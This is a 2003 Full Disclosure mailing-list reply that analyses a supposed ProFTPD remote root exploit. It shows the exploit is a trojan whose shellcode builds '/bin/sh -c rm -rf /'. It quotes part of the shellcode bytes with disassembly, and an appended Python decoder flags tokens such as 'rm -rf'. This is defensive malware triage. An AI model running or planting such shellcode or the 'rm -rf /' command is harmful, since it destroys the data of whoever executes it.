Full Disclosure mailing list archives
Re: ProFTPD-1.2.9rc2 remote root exploit
From: Philipp Buehler <pb+full-disclosure () mlsub buehler net>
Date: Fri, 24 Oct 2003 17:34:53 +0200
On 24/10/2003, GARCIA Lionel <lionel.garcia () airbus com> wrote To full-disclosure () lists netsys com:
> ---> void(*sleep)()=(void*)sc;sleep(5); <------- Hummm :-\

obscure the obvious :)

> The shellcode seems to be locally launched. Anybody to "decrypt" the shellcode ?

Well, not "fully", since this already gives enough clues:

\x31\xc0              xorl  %eax,%eax
\x50                  pushl %eax
\x68\x66\x20\x2f\x58  pushl $0x66202f58   !"f /X"
\x68\x6d\x20\x2d\x72  pushl $0x6d202d72   !"m -r"
\x68\x2d\x63\x58\x72  pushl $0x2d635872   !"rcXr"
\x68\x41\x41\x41\x41  pushl $0x41414141   !"AAAA"
\x68\x41\x41\x41\x41  pushl $0x41414141   !"AAAA"
\x68\x41\x41\x41\x41  pushl $0x41414141   !"AAAA"
\x68\x41\x41\x41\x41  pushl $0x41414141   !"AAAA"
\x68\x2f\x73\x68\x43  pushl $0x2f736843   !"/shC"
\x68\x2f\x62\x69\x6e  pushl $0x2f62696e   !"/bin"
\x31\xc0              xorl  %eax,%eax

Then some "creative hopping" to connect this to an
"/bin/sh rm -rf /"

If shellcode matches 0x72, 0x6d, 0x2d and 0x66 .. always be "alerted" :>

'LOVE' in the air ... :)

ciao
--
Philipp Buehler, aka fips | <double-p>
When the horse dies, get off.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
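
Added example (not part of the original message): a small Python linear-sweep decoder that rebuilds the string the push run in the listing above leaves on the stack, so an untrusted "exploit" can be triaged without compiling or running it. The function names and the token list are choices made for this example; the bytes are the ones quoted in the message.

```python
import re

# Bytes transcribed from the listing quoted in the message (only the decoded part).
SHELLCODE_PREFIX = bytes.fromhex(
    "31c0" "50"
    "6866202f58" "686d202d72" "682d635872"
    "6841414141" "6841414141" "6841414141" "6841414141"
    "682f736843" "682f62696e"
    "31c0"
)

# Tokens worth a closer look in a stack-built command line (example list, not exhaustive).
SUSPICIOUS = re.compile(rb"/bin/sh|rm -rf|-c")


def stack_string(code: bytes) -> bytes:
    """Decode the three opcodes the listing uses and return the pushed bytes
    in memory order (last push sits at the lowest address, so it comes first)."""
    pushes, i, eax_zero = [], 0, False
    while i < len(code):
        op = code[i]
        if op == 0x68 and i + 5 <= len(code):        # push imm32
            pushes.append(code[i + 1:i + 5])
            i += 5                                   # skip the immediate: "/shC" holds a 0x68 ('h')
        elif op == 0x31 and code[i + 1:i + 2] == b"\xc0":   # xor eax,eax
            eax_zero = True
            i += 2
        elif op == 0x50:                             # push eax
            pushes.append(b"\x00" * 4 if eax_zero else b"????")
            i += 1
        else:                                        # unknown opcode: stop rather than guess
            break
    return b"".join(reversed(pushes))


def flagged(code: bytes) -> list:
    """Return the suspicious tokens found in the reconstructed stack string."""
    return SUSPICIOUS.findall(stack_string(code))


if __name__ == "__main__":
    print(stack_string(SHELLCODE_PREFIX))
    print(flagged(SHELLCODE_PREFIX))
```

A byte-wise search for 0x68 would misalign on the 'h' inside "/shC", which is why the sweep advances by instruction length instead.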